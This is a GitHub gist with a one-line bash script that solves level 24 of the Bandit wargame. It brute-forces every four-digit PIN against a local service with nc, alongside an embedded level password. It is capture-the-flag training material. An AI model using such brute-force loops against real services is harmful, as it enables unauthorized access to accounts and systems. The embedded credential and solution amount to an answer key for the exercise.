Skip to content

Instantly share code, notes, and snippets.

@paulserraino
Created May 20, 2016 04:07
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save paulserraino/c433201eb5981446d19e1fd9a95bb238 to your computer and use it in GitHub Desktop.
Save paulserraino/c433201eb5981446d19e1fd9a95bb238 to your computer and use it in GitHub Desktop.
Bandit level 24 one liner
#!/bin/bash
for x in {0..9}{0..9}{0..9}{0..9}; do echo "pin $x"; echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $x" | nc localhost 30002 2>&1 | grep -A1 Cor.* && break; done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment